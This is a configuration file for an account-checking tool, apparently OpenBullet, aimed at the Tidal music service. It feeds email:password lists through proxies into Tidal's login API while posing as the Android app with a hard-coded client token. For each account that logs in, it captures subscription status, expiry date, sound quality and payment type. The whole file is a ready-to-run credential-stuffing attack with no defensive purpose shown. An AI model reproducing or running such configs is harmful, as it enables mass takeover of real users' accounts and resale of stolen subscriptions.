[SETTINGS]
{
  "Name": "Tidal",
  "SuggestedBots": 100,
  "LastModified": "2018-05-07T11:28:34.0821625+00:00",
  "AdditionalInfo": "",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#LOGIN REQUEST POST "https://api.tidal.com/v1/login/username" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&token=kgsOOmYk3zShYrNP&clientUniqueKey=0023efc429a34444&clientVersion=1.16.7" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: TIDAL_ANDROID/709 okhttp/3.3.1" 
  HEADER "Pragma: no-cache" 
#CHECK_IF_VALID KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "userId" 
  KEYCHAIN Failure OR 
    KEY "Username or password is wrong" 
#PARSE_USERID PARSE "<SOURCE>" JSON "userId" Recursive=FALSE -> VAR "USERID" "" "" 
#PARSE_SESSION_ID PARSE "<SOURCE>" JSON "sessionId" Recursive=FALSE -> VAR "SESSIONID" "" "" 
#GET_SUB_DATA REQUEST GET "https://api.tidal.com/v1/users/<USERID>/subscription?countryCode=NO" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: TIDAL_ANDROID/709 okhttp/3.3.1" 
  HEADER "Pragma: no-cache" 
  HEADER "X-Tidal-SessionId: <SESSIONID>" 
#CHECK_IF_FREE KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "\"FREE\"" 
#PARSE_EXPIRATION PARSE "<SOURCE>" LR "validUntil\":\"" "T" Recursive=FALSE -> CAP "Valid Until" "" "" 
#PARSE_HSQ PARSE "<SOURCE>" LR "highestSoundQuality\":\"" "\"" Recursive=FALSE -> CAP "Highest Quality" "" "" 
#PARSE_PAYMENT_TYPE PARSE "<SOURCE>" LR "paymentType\":\"" "\"" Recursive=FALSE -> CAP "Payment Type" "" "" 
